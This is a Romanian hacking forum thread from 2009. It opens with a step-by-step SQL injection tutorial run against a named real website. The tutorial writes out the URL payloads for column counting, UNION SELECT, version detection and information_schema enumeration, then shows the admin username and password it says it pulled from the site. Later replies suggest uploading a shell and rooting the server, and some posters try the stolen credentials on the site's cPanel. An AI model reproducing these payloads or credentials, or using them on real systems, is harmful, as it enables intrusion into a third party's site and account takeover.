ZeroCold Posted June 18, 2009 Report Posted June 18, 2009 (edited) Tutorial SQL InjectionCred ca nu a fost postat pt ca l-am cautat si nu l-am gasit... Sa incepem PASUL 1:-gasim un site: eu am luat www.magiacopilariei.roPASUL 2:-cautam vulnerabilitatea: intram aici: http://www.magiacopilariei.ro/articole.php?articol=8PASUL 3:-dupa 8 punem '-va arata asa: http://www.magiacopilariei.ro/articole.php?articol=8'Obs: Dupa ce am pus ' dupa 8 si am dat enter vedem ca a aparut o eroare,aceasta eroare ne spune noua ca acest site este vulnerabil.-Eroarea care o da arata asa:QF: select * from articole where id=8\'PASUL 4:-acum ca stim ca acest site este vulnerabil folosim:order by--pentru a afla numarul de coloane din db sql.-vom pune asa:http://www.magiacopilariei.ro/articole.php?articol=8 order by 100---am pus numarul de coloane 100.Obs: Eroarea a aparut din nou, acum stim ca are mai putin de 100 de coloane.-acum in loc de 100 punem 1.-va arata asa: http://www.magiacopilariei.ro/articole.php?articol=8 order by 1--Obs: Eroarea a disparut, inseamna ca are mai mult de 1 coloana si mai putin de 100.-acum punem 10 pentru a vedea daca sunt mai putine de 10.http://www.magiacopilariei.ro/articole.php?articol=8 order by 10--Obs: Eroarea a aparut, deci sunt mai putin de 10.-acum punem 5:http://www.magiacopilariei.ro/articole.php?articol=8 order by 5--Obs: eroarea a aparut, sunt mai putin de 5-punem 4.http://www.magiacopilariei.ro/articole.php?articol=8 order by 4--Obs: EROAREA NU APARE, DECI SUNT 4 COLOANEPASUL 5:-dupa ce am aflat cate coloane are (are 4 coloane) folosim:union all select -vom scrie asa:http://www.magiacopilariei.ro/articole.php?articol=8 union all select 1,2,3,4--Obs: Vedem ca nu apare nimic, inseamna ca functia union nu functioneaza.PASUL 5:-schimbam id-ul din url si in loc de "articol=8" punem "articol=-1"-va arata asa: http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,2,3,4--Obs: Pe pagina au aparut doua cifre (4-2), acelea sunt coloanele vulnerabile.PASUL 6:-pentru a afla versiunea punem in loc de coloanele vulnerabile (4-2):@@version-va arata asa:http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,@@version,3,4--(eu l-am ales pe 2, puteti sa-l alegeti si pe 4, important este sa fie o cifra care va apare pe pagina)Obs:In loc de cifra 2 care ne-a aparut in pasul anterior a aparut versiunea. (versiunea este: 5.0.32-Debian_7etch8-log )PASUL 7:-daca versiunea este mai mare de 5 folosim "information_schema" daca este mai mica ghicim totul.-in cazul nostru versiunea este mai mare de 5, deci flolosim "information_schema"-acum pentru a afla numele tabelelor punem in loc de 2:table_namesi dupa 4 punem from information_schema.tables---va arata asa:http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,table_name,3,4 from information_schema.tables--Obs: a aparut"CHARACTER_SETS", este numele unui tabel, noua ne trebuie ceva de genu admin...utilizator...user.-acum pentru a vedea numele urmatorului tabel folosim "limit".-dupa "from information_schema.tables--" adaugam "limit 1,1--"-va arata asa:http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,table_name,3,4 from information_schema.tables limit 1,1--Obs: a aparut "COLLATIONS", noi va trebui sa inlocuim 1,1 cu 2,1 ; 3,1...si tot asa pana ne zice ceva de legat de admin/user/username.-la "limit 20,1--" am primit "USER":http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,table_name,3,4 from information_schema.tables limit 20,1---am aflat numele tabelului, mai trebuie si coloana.-acum inlocuim "table_name" cu "column_name" si in "information_schema.tables" scriem "information_schema.columns" http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,column_name,3,4 from information_schema.columns limit 20,1--PASUL 8: -acum aflam username si pass-ne folosim de ce ne-a dat la pasul 7 cand am primit numele tabelului "USER"-inlocuim "information_schema.columns limit 20,1--" cu "user--", iar in loc de 2 punem username sau user.-va arata asa:http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,username,3,4 from user--Obs: apare eroare ..NU E BINE!-inlocuim "username" cu "user":-va arata asa:http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,user,3,4 from user--Obs: in loc de cifra 4 scrie "Admin"..acesta este username-ul.-acum ca am aflat username trebuie sa aflam parola...-inlocuim "user" cu "password".-vom avea asa:http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,password,3,4 from user--Obs: Apare eroare, iar nu e bine.-inlcuim "password" cu "pass", vom avea asa:http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,pass,3,4 from user--Obs: A aparun "sunshine". Aceasta este parola.PASUL 9:-Va logati cu nume si parola.-In cazul siteului www.magiacopilariei.ro nu avem unde sa ne logam, trebuie sa folosim ftp.-Puteti cauta alte siteuri si sa le testati.FINISH!ATENTIE!!! Spargerea siteurilor este ILEGALA!!! Acest tutorial este doar informativ, nu sunt responsabil pentru pagubele provocate. Edited June 18, 2009 by ZeroCold 1 1
Vlachs Posted June 18, 2009 Report Posted June 18, 2009 Tutorial SQL InjectionCred ca nu a fost postat pt ca l-am cautat si nu l-am gasit... Sa incepem PASUL 1:-gasim un site: eu am luat PASUL 2:-cautam vulnerabilitatea: intram aici: PASUL 3:-dupa 8 punem '-va arata asa:Obs: Dupa ce am pus ' dupa 8 si am dat enter vedem ca a aparut o eroare,aceasta eroare ne spune noua ca acest site este vulnerabil.-Eroarea care o da arata asa:PASUL 4:-acum ca stim ca acest site este vulnerabil folosim:order by--pentru a afla numarul de coloane din db sql.-vom pune asa:-am pus numarul de coloane 100.Obs: Eroarea a aparut din nou, acum stim ca are mai putin de 100 de coloane.-acum in loc de 100 punem 1.-va arata asa: Obs: Eroarea a disparut, inseamna ca are mai mult de 1 coloana si mai putin de 100.-acum punem 10 pentru a vedea daca sunt mai putine de 10.Obs: Eroarea a aparut, deci sunt mai putin de 10.-acum punem 5:Obs: eroarea a aparut, sunt mai putin de 5-punem 4.Obs: EROAREA NU APARE, DECI SUNT 4 COLOANEPASUL 5:-dupa ce am aflat cate coloane are (are 4 coloane) folosim:union all select -vom scrie asa:Obs: Vedem ca nu apare nimic, inseamna ca functia union nu functioneaza.PASUL 5:-schimbam id-ul din url si in loc de "articol=8" punem "articol=-1"-va arata asa: Obs: Pe pagina au aparut doua cifre (4-2), acelea sunt coloanele vulnerabile.PASUL 6:-pentru a afla versiunea punem in loc de coloanele vulnerabile (4-2):@@version-va arata asa:(eu l-am ales pe 2, puteti sa-l alegeti si pe 4, important este sa fie o cifra care va apare pe pagina)Obs:In loc de cifra 2 care ne-a aparut in pasul anterior a aparut versiunea. (versiunea este: 5.0.32-Debian_7etch8-log )PASUL 7:-daca versiunea este mai mare de 5 folosim "information_schema" daca este mai mica ghicim totul.-in cazul nostru versiunea este mai mare de 5, deci flolosim "information_schema"-acum pentru a afla numele tabelelor punem in loc de 2:table_namesi dupa 4 punem from information_schema.tables---va arata asa:Obs: a aparut"CHARACTER_SETS", este numele unui tabel, noua ne trebuie ceva de genu admin...utilizator...user.-acum pentru a vedea numele urmatorului tabel folosim "limit".-dupa "from information_schema.tables--" adaugam "limit 1,1--"-va arata asa:Obs: a aparut "COLLATIONS", noi va trebui sa inlocuim 1,1 cu 2,1 ; 3,1...si tot asa pana ne zice ceva de legat de admin/user/username.-la "limit 20,1--" am primit "USER":-am aflat numele tabelului, mai trebuie si coloana.-acum inlocuim "table_name" cu "column_name" si in "information_schema.tables" scriem "information_schema.columns" PASUL 8: -acum aflam username si pass-ne folosim de ce ne-a dat la pasul 7 cand am primit numele tabelului "USER"-inlocuim "information_schema.columns limit 20,1--" cu "user--", iar in loc de 2 punem username sau user.-va arata asa:Obs: apare eroare ..NU E BINE!-inlocuim "username" cu "user":-va arata asa:Obs: in loc de cifra 4 scrie "Admin"..acesta este username-ul.-acum ca am aflat username trebuie sa aflam parola...-inlocuim "user" cu "password".-vom avea asa:Obs: Apare eroare, iar nu e bine.-inlcuim "password" cu "pass", vom avea asa:Obs: A aparun "sunshine". Aceasta este parola.PASUL 9:-Va logati cu nume si parola.-In cazul siteului www.magiacopilariei.ro nu avem unde sa ne logam, trebuie sa folosim ftp.-Puteti cauta alte siteuri si sa le testati.FINISH!ATENTIE!!! Spargerea siteurilor este ILEGALA!!! Acest tutorial este doar informativ, nu sunt responsabil pentru pagubele provocate.e facut de tine tutorialul ? 1
ZeroCold Posted June 18, 2009 Author Report Posted June 18, 2009 (edited) Nu in totalitate, tutorialul original este acesta Hell Software - Forum de discu?ii: Tutorial SQL Injection , eu doar am explicat putin mai detaliat...PS: As fi recunoscator daca ar face cineva un tutorial asemanator^^ despre XSS. Multumesc! Edited June 18, 2009 by ZeroCold
Vlachs Posted June 18, 2009 Report Posted June 18, 2009 asta e cam 27% din sql injection si "articolul" tau se defera la mysql injection
loki Posted June 18, 2009 Report Posted June 18, 2009 O referinta, (stiu ca sunt multe altele pe net), pe asta o aveam in favorite si mai trag un ochi din cand in cand:htp://packetstorm.igor.onlinedirect.bg/papers/database/mssql-pwnage.txt
Guest Kabron Posted June 18, 2009 Report Posted June 18, 2009 YE YE YE toata lumea face tutoriale SQL injection dar nu stim baza SQL bun bun
M4T3! Posted June 22, 2009 Report Posted June 22, 2009 O intrebare:dupa ce te loghezi ca admin ce poti face?vreau sa stiu TOT ce poti face?adica de la deface la ce?
Guest Praetorian Posted June 22, 2009 Report Posted June 22, 2009 Pai imagineaza-ti ca ai deschis un site/forum si ai acces admin!Ce poti face?
Cheater Posted June 23, 2009 Report Posted June 23, 2009 ...iti zic eu depinde de cum e facut panoul de administrare si ce e facut sa poti face din el...daca vrei mai mult cauti sa urci un shell si poate cu un exploit sa iei si root...
Rechinu Posted June 23, 2009 Report Posted June 23, 2009 YE YE YE toata lumea face tutoriale SQL injection dar nu stim baza SQL bun bunAici cam are dreptate.trebuie sa invatam mai intai despre bazede de date SQL si apoi sa sa cautam vulnerabilitati.Ar fi fost fain daca ar daca AR LASA "UNU"DE PE HB un tutorial complet despre injectarea cu cod malitios baze de date sql,mysql,mssql.Ceva super complet cu detalii cu tot.
Adso Posted June 23, 2009 Report Posted June 23, 2009 UNU e printre putini care ii respect in ceea ce face in domeniul sqli... multi ar avea ce sa invete de la el.cat despre tutorial... sunt peste 100 toate al fel.... toate copiate unul din altul:|
edededi Posted June 25, 2009 Report Posted June 25, 2009 am si eu cateva intrebari : poate fi vulnerabila o pagina care nu are linkul de forma x=numar ? si daca da , cum procedam ?2) cum ar arata pagina daca ar mergem union all select?
begood Posted June 25, 2009 Report Posted June 25, 2009 @ edededi sau te lasi de meserie, sau incerci sa te abtii de la postat intrebari idioate, si te pui pe cautat pe google tutoriale deja facute ( sunt cu milioanele ) sau convingi pe unu care are timp de tine sa-ti explice pe IM. practic ce faci tu e spam.
edededi Posted June 25, 2009 Report Posted June 25, 2009 Multumesc begood pentru raspunsul tau plin de informatii utile.Nu pricep ce contin intrebarile mele de sunt asa idioate,pur si simplu am intrebat de o chestie care nu e prezenta in acest tutorial, de aici pana "a face spam" e cale lunga.Multumesc inca odata ca m-ati lamurit
Cheater Posted June 26, 2009 Report Posted June 26, 2009 Ar fi frumos un challenge sqli...chiar ma gandesc sa fac eu unul pun un virtual machine pe un server pt asta;) si apoi vb si poate iese ceva misto.
begood Posted June 26, 2009 Report Posted June 26, 2009 @Cheater vorbeste cu Hertz o sa fie incantat de idee.
Cheater Posted June 26, 2009 Report Posted June 26, 2009 O sa il caut, cred ca o sa iasa o chestie destul de interesantaEDIT: Hertz da-mi PM, daca esti interesat sa facem challengeuri pt rst, nu de alta dar vad ca nu ai lasati nici o metoda de contact publica.
NIFOS Posted June 26, 2009 Report Posted June 26, 2009 Accesul la cpanel se face prin https://www.magiacopilariei.ro:8443 insa admin:sunshine nu merge wtf???
M4T3! Posted June 26, 2009 Report Posted June 26, 2009 Nifos de unde stiai cum se face accesul la cpanel? Si de unde stiai portul 8443?si user nameul e Admin
loki Posted June 27, 2009 Report Posted June 27, 2009 Accesul la cpanel se face prin https://www.magiacopilariei.ro:8443 insa admin:sunshine nu merge wtf???posibil accesul sa fie setat numai pe localhost
Cheater Posted June 27, 2009 Report Posted June 27, 2009 mi se pare firesc, la cpanel userul este de obicei numele directorului din home unde este siteul (incearca sa generezi o eroare in php sa iti raspunda cu error at line on si adresa catre fisier), unii il pun ca fiind primele 8 litere din domeniu, si pass una aleasa de cel care a deschis contul, de obicei cel putin de complexitate medie si diferita de domeniu, in cazul de fata este posibil sa fie sunshine.
NIFOS Posted June 29, 2009 Report Posted June 29, 2009 De port stiam de la un alt membru de aici, iar parola de obicei e la fel cu cea de la ftp.
Cheater Posted June 29, 2009 Report Posted June 29, 2009 userul si pass mai exact sunt ca cele de la ftp, portul mi se pare ca e cel default de la cpanel, mai se poate accesa in mod normal si prin site.tld/cpanel si te redirectioneaza la login.